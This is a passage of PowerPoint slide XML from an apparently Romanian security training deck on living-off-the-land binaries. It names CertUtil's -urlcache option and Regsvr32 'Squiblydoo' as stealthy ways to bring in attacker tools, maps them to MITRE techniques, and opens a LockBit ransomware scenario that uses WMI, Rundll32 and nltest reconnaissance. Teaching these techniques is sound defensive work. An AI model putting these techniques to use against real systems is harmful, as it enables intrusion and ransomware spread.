            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vrea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aducă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instrumente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suplimentare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fără</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atragă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atenția</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>folosește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CertUtil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Regsvr32.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CertUtil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nu e un downloader, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>știe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlcache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Regsvr32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>folosit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Squiblydoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- MITRE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingress Tool Transfer (T1105) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CertUtil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Signed Binary Proxy Execution (T1218), sub-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tehnica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> T1218.010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Regsvr32)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25086105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53C4B-BA8F-0976-5D23-83C88C361E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70FCED-9BCA-B952-0482-3C2E0193CF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6698B2F2-8F45-8A30-6C06-BB58A81BB0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="780095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ex. 3: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WMI &amp; Rundll32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Ransomware</a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C09DBF4-6D7F-8409-44D4-DCD7B2CFC7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FDDBBA-6FE4-63C7-23A1-0A110631B03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248088" y="2463478"/>
            <a:ext cx="1153278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1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenariu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grupare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de ransomware (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LockBit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pătrunde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>într</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>organizație</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>folosește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a automatize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instalarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cu ransomware pe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mașinile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rețea</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recon: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nltest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domenii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows) care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listează</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mașinile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domeniu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>țintele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>viabile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
